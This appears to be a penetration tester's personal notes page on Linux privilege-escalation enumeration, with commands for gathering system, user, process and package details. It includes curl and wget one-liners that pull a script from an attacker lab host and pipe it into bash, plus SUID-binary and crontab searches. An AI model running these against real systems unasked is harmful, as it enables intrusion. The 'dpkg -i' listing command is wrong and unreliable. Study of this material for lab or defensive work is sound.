Linux

Monday, August 17, 2020

3:14 PM Backlink: reference-notes-readme

Enumeration Guides

Basic Linux Privilege Escalation - g0tmi1k

https://gtfobins.github.io/gtfobins/docker/

Manual Enumeration

What is the OS? What version? What architecture? What kernel?

uname -i; cat /etc/*-release; uname -a

Who are we? Were are we?

id; pwd

What users are on this box, and which ones of those have a valid shell?

cat /etc/passwd; echo ''; grep -vE "nologin|false" /etc/passwd

What is currently running on the box? What active network services are there?

ps aux; echo ''; netstat -antup

What packages are installed? Debian:

dpkg -i

CenOS/openSUSE:

rpm -qa

Living Off The Land

I can execute scripts hosted remotely without having to save the file locally by using bash redirects. See https://stackoverflow.com/questions/5735666/execute-bash-script-from-url.

curl -s http://10.10.14.21/linux_smart_enum.sh | bash /dev/stdin -l 1

Or use wget, which is more commonly installed on servers than curl.

wget -O - http://192.168.49.95/script.sh | bash

Kernel Exploits

SUID-bit

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

Crontab jobs

I can check the system-wide crontab with:

cat /etc/crontab